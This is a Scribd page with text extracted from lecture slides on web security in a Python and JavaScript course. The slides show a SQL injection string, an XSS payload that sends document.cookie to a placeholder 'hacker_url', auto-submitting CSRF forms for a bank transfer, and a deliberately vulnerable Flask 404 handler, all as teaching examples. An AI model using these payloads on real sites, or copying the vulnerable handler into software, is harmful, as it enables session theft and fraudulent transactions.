Scribd
Upload
251 views66 pages

Web Programming: Python & JavaScript Guide

This document provides an overview of topics related to web programming with Python and JavaScript. It covers fundamentals like HTML, Flask, APIs, and SQL, as well as more advanced topics such as Git, JavaScript, Django, security concepts like authentication and cryptography, testing, and deploying websites. The document also discusses scaling applications and attacks like denial of service.

Uploaded by

Moudi Mouhamadou
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
251 views66 pages

Web Programming: Python & JavaScript Guide

This document provides an overview of topics related to web programming with Python and JavaScript. It covers fundamentals like HTML, Flask, APIs, and SQL, as well as more advanced topics such as Git, JavaScript, Django, security concepts like authentication and cryptography, testing, and deploying websites. The document also discusses scaling applications and attacks like denial of service.

Uploaded by

Moudi Mouhamadou
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
  • Web Programming with Python and JavaScript: Introduces the context and scope of using Python and JavaScript in web programming.
  • Security: Covers the basics of security principles important for web development.
  • Topics: Lists the different topics that will be covered in the course, such as Git, HTML, and Flask.
  • Git: An introduction to using Git for version control in development projects.
  • Open-Source Software: Discusses the role and importance of open-source software in web programming.
  • Two-Factor Authentication: Details the implementation and benefits of using two-factor authentication for security.
  • First Commit: Visual representation of the process and importance of making the initial commit in version control.
  • HTML: Explores the basics of HTML for structuring web pages.
  • Flask: Introduces Flask as a framework for building web applications in Python.
  • HTTP and HTTPS: Explains the protocols HTTP and HTTPS and their roles in secure web communication.
  • Cryptography: Discusses fundamental concepts of cryptography in securing data transmission.
  • Environment Variables: Shows how to use environment variables to manage application settings securely.
  • SQL: Introduction to SQL for database management and interaction.
  • APIs: Introduction to APIs and their significance in enabling communication between different software systems.
  • JavaScript: Covers the basics of JavaScript for building interactive web pages.
  • Django: Presents Django as a high-level Python web framework for rapid development.
  • Testing, CI/CD: Discusses testing and continuous integration/continuous deployment (CI/CD) practices for maintaining code quality.
  • Scalability: Explores strategies for ensuring web applications can scale effectively.
  • Other Web Frameworks: Introduces additional web frameworks beyond Flask and Django for both server-side and client-side development.
  • Deploying Websites: Details various platforms and services for deploying websites efficiently.

Web Programming

with Python and JavaScript


Security
Topics
• Git
• HTML
• Flask
• SQL
• APIs
• JavaScript
• Django
• CI/CD
• Scalability
• ...
Git
Open-Source Software
Two-Factor Authentication
first
commit
first credentials
commit exposed
first credentials credentials
commit exposed removed
HTML
<a href="url1">
url2
</a>
Flask
HTTP and HTTPS
Cryptography
Secret-Key Cryptography
Key
Ciphertext
Plaintext
Key
Ciphertext
Plaintext

Ciphertext
Plaintext
Key
Public-Key Cryptography
Public Key Private Key
Plaintext

Public Key Private Key


Plaintext
Ciphertext
Public Key

Private Key
Plaintext
Ciphertext
Public Key

Ciphertext
Plaintext
Private Key
Environment Variables
app.config["SECRET_KEY"] = "dHdlbnR5ZWlnaHQ"
app.config["SECRET_KEY"] = os.environ.get("SECRET_KEY")
SQL
users
id username password

1 anushree hello

2 elle password

3 rodrigo 12345

4 sebasUan abcdef

5 jessica qwerty
users
id username password

1 anushree 48c8e8c3f9e80b68ac67304c7c510e9fcb

2 elle 6024aba15e3f9be95e3c9e6d3bf261d78e

3 rodrigo 90112701066c0a536f2f6b2761e5edb09e

4 sebasUan b053b7574c8a25751e2a896377e5d477c5

5 jessica a4048eaaee50680532845b2025996b44a9
SQL InjecUon
Username:

Password:
SELECT * FROM users
WHERE (username = username)
AND (password = password);
Username:
alice

Password:
hello
SELECT * FROM users
WHERE (username = username)
AND (password = password);
SELECT * FROM users
WHERE (username = 'alice')
AND (password = 'hello');
Username:
alice

Password:
1' OR '1' = '1
SELECT * FROM users
WHERE (username = username)
AND (password = password);
SELECT * FROM users
WHERE (username = 'alice')
AND (password = '1' OR '1' = '1');
APIs
API Keys
API Keys

• Rate Limiting
• Route Authentication
JavaScript
Cross-Site Scripting
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def index():
return "Hello, world!"

@app.errorhandler(404)
def page_not_found(e):
return "Not Found: " + request.path
@app.errorhandler(404)
def page_not_found(e):
return "Not Found: " + request.path
/foo

@app.errorhandler(404)
def page_not_found(e):
return "Not Found: " + request.path
/<script>alert('hi')</script>

@app.errorhandler(404)
def page_not_found(e):
return "Not Found: " + request.path
/<script>document.write(
'<img src="hacker_url?cookie="
+document.cookie+">")</script>

@app.errorhandler(404)
def page_not_found(e):
return "Not Found: " + request.path
Django
Cross-Site Request Forgery
<body>
<a href="http://yourbank.com/transfer?to=brian&amt=2800">
Click Here!
</a>
</body>
<body>
<img src="http://yourbank.com/transfer?to=brian&amt=2800">
</body>
<body>
<form action="https://yourbank.com/transfer"
method="post">
<input type="hidden" name="to" value="brian">
<input type="hidden" name="amt" value="2800">
<input type="submit" value="Click Here!">
</form>
</body>
<body onload="document.forms[0].submit()">
<form action="https://yourbank.com/transfer"
method="post">
<input type="hidden" name="to" value="brian">
<input type="hidden" name="amt" value="2800">
<input type="submit" value="Click Here!">
</form>
</body>
<form action="/transfer" method="post">
{% csrf_token %}
<input name="to" value="brian">
<input name="amt" value="2800">
<input type="submit" value="Transfer">
</form>
Testing, CI/CD
Scalability
DoS Attacks
DDoS Attacks
What's next?
Other Web Frameworks
• Server-Side
• Express.js
• Ruby on Rails
• ...
• Client-Side
• AngularJS
• React
• Vue.js
• ...
Deploying Websites

• Amazon Web Services


• GitHub Pages
• Google Cloud
• Heroku
• Microsoft Azure
• ...
Web Programming
with Python and JavaScript

You might also like